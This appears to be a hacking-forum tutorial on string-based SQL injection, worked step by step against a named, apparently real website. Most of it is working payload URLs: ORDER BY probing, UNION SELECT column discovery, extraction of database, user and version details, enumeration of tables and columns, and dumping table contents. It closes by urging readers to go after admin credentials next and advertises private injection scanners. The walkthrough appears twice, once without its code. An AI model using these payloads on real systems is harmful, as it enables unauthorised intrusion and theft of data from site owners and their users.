| String Based SQL Injection | 01-23-2013, 06:11 AM
#1
Welcome to my TUT, i seen most of you web hackers around here have basic integer injection down, well lets expand your knowledge shall we
Okay so lets say we have found our vulnerable site and we have tried everything to get column count but cant
STOP! Before you pull out havij or some tool, dont give up and lets fire up your brain 
VULN LINK:
WHAT WE HAVE TRIED:
Well now we can try string based injection to see if we can get an error and the column count :> We just add the normal ' behind our injection point and then --+ at the end of our syntax. Ex.
If we get an error than that means its string based and the injection was successful. Should get an error like this:
![[Image: 0260e-a0431077-c499-474d-9208-fcac354e4e53.png]](http://s2.grabilla.com/0260e-a0431077-c499-474d-9208-fcac354e4e53.png)
NEXT WE FIND COLUMN COUNT:
To find the column count, we just do the normal order by. should look like this:
We keep moving the number up until we get an error. For this site we get an error at order by 7.
So that means we have our column count of 6 now
Next lets use union select to find our columns we can inject our commands into. We will stop the count at the number we found our column count at, which was 6.
After running this command we should see our injectable columns. For the site above it will look like this:
![[Image: 0260e-95ec4768-8c5a-49cf-8859-8da27cfda3db.png]](http://s2.grabilla.com/0260e-95ec4768-8c5a-49cf-8859-8da27cfda3db.png)
So this means we will use 2, 3, and 4 to inject our commands.
Now we try to view the database name, user and other.
with one of the numbers we can view the details. For this TUT i will be using 4 but you can also use 2, and 3 if you want.
Syntax:
Or you can use:
If these do not work we can use CONCAT_WS() :
If one of the above work you should get something like this:
![[Image: 0260e-00fa49bf-75c2-42ba-a58a-4de1c8c020d2.png]](http://s2.grabilla.com/0260e-00fa49bf-75c2-42ba-a58a-4de1c8c020d2.png)
Now lets read some tables : >
We are still using the column 4 to read data from tables.
Syntax:
We should get the names of the tables, like so:
![[Image: 0260e-60977032-82a9-4535-bd51-eb2f96a58f92.png]](http://s2.grabilla.com/0260e-60977032-82a9-4535-bd51-eb2f96a58f92.png)
Now we have our tables, lets choose one to read data from. For this site lets use "contact_us".
Syntax:
Notice how we change the from option. It was from information_schema.tables but now since we have found all our table names we want to move onto column names. so we change it to "information_schema.columns" simple enough ahhh
So after the command we may get something unsuspected. Dont give up, its common. Not working ? no problem convert the table name to a hex string.
Go to: http://www.string-functions.com/string-hex.aspx
Converted the table 'contact_us' is 636f6e746163745f7573.
So our syntax looks like this:
If the command completes you will receive this:
![[Image: 0260e-5024edcf-40ef-4aff-ba98-399326247410.png]](http://s2.grabilla.com/0260e-5024edcf-40ef-4aff-ba98-399326247410.png)
Finally we are going to read out the data which is in whoto,contact_text.
Syntax:
Notice how we change the from option once again. This time we change it to from " "Database name "."column name" ". So we use the database name we collected from earlier acalltomen_com in the TUT and the column name we want to read data out of contact_us
We will end up with this if successful:
![[Image: 0260e-2e573064-8e05-411f-8cc6-7fe47282fb73.png]](http://s2.grabilla.com/0260e-2e573064-8e05-411f-8cc6-7fe47282fb73.png)
Well thats about all to it, You know how to read information using string based SQLI so next we search and try to read the admin information
Good luck and i hope someone learns from this.
Okay so lets say we have found our vulnerable site and we have tried everything to get column count but cant
STOP! Before you pull out havij or some tool, dont give up and lets fire up your brain 
VULN LINK:
PHP Code:
http://www.acalltomen.com/page.php?id=1
WHAT WE HAVE TRIED:
PHP Code:
http://www.acalltomen.com/page.php?id=1 order by 100
http://www.acalltomen.com/page.php?id=1+order+by+100
NO COLUMN COUNT :(
Well now we can try string based injection to see if we can get an error and the column count :> We just add the normal ' behind our injection point and then --+ at the end of our syntax. Ex.
PHP Code:
http://www.acalltomen.com/page.php?id=1' order by 100--+
Spoiler:
![[Image: 0260e-a0431077-c499-474d-9208-fcac354e4e53.png]](http://s2.grabilla.com/0260e-a0431077-c499-474d-9208-fcac354e4e53.png)
NEXT WE FIND COLUMN COUNT:
To find the column count, we just do the normal order by. should look like this:
PHP Code:
http://www.acalltomen.com/page.php?id=1' order by 1--+
We keep moving the number up until we get an error. For this site we get an error at order by 7.
PHP Code:
http://www.acalltomen.com/page.php?id=1' order by 7--+
So that means we have our column count of 6 now

Next lets use union select to find our columns we can inject our commands into. We will stop the count at the number we found our column count at, which was 6.
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,4,5,6--+
After running this command we should see our injectable columns. For the site above it will look like this:
Spoiler:
![[Image: 0260e-95ec4768-8c5a-49cf-8859-8da27cfda3db.png]](http://s2.grabilla.com/0260e-95ec4768-8c5a-49cf-8859-8da27cfda3db.png)
So this means we will use 2, 3, and 4 to inject our commands.
Now we try to view the database name, user and other.
with one of the numbers we can view the details. For this TUT i will be using 4 but you can also use 2, and 3 if you want.
Syntax:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat("DB:",database()," Version:",version()," User:",user()),5,6--+
Or you can use:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat(database(),0x3a,version(),0x3a,user()),5,6--+
If these do not work we can use CONCAT_WS() :
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6--+
If one of the above work you should get something like this:
Spoiler:
![[Image: 0260e-00fa49bf-75c2-42ba-a58a-4de1c8c020d2.png]](http://s2.grabilla.com/0260e-00fa49bf-75c2-42ba-a58a-4de1c8c020d2.png)
Now lets read some tables : >
We are still using the column 4 to read data from tables.
Syntax:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+
We should get the names of the tables, like so:
Spoiler:
![[Image: 0260e-60977032-82a9-4535-bd51-eb2f96a58f92.png]](http://s2.grabilla.com/0260e-60977032-82a9-4535-bd51-eb2f96a58f92.png)
Now we have our tables, lets choose one to read data from. For this site lets use "contact_us".
Syntax:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name="contact_us"--+
Notice how we change the from option. It was from information_schema.tables but now since we have found all our table names we want to move onto column names. so we change it to "information_schema.columns" simple enough ahhh

So after the command we may get something unsuspected. Dont give up, its common. Not working ? no problem convert the table name to a hex string.
Go to: http://www.string-functions.com/string-hex.aspx
Converted the table 'contact_us' is 636f6e746163745f7573.
So our syntax looks like this:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x[CONVERTED STRING]--+
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x636f6e746163745f7573--+
If the command completes you will receive this:
Spoiler:
![[Image: 0260e-5024edcf-40ef-4aff-ba98-399326247410.png]](http://s2.grabilla.com/0260e-5024edcf-40ef-4aff-ba98-399326247410.png)
Finally we are going to read out the data which is in whoto,contact_text.
Syntax:
PHP Code:
http://www.acalltomen.com/page.php?id=1' union select 1,2,3,concat(whoto,0x3a,contact_text),5,6 from acalltomen_com.contact_us--+
Notice how we change the from option once again. This time we change it to from " "Database name "."column name" ". So we use the database name we collected from earlier acalltomen_com in the TUT and the column name we want to read data out of contact_us
We will end up with this if successful:
Spoiler:
![[Image: 0260e-2e573064-8e05-411f-8cc6-7fe47282fb73.png]](http://s2.grabilla.com/0260e-2e573064-8e05-411f-8cc6-7fe47282fb73.png)
Well thats about all to it, You know how to read information using string based SQLI so next we search and try to read the admin information
Good luck and i hope someone learns from this.
![[Image: 8Hd3UZQ.png]](http://i.imgur.com/8Hd3UZQ.png)
My Private Tools:
[*] Private SQL INJECTION SCANNER! [*]
[*] HQ Tutiorals Too! [*]


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)


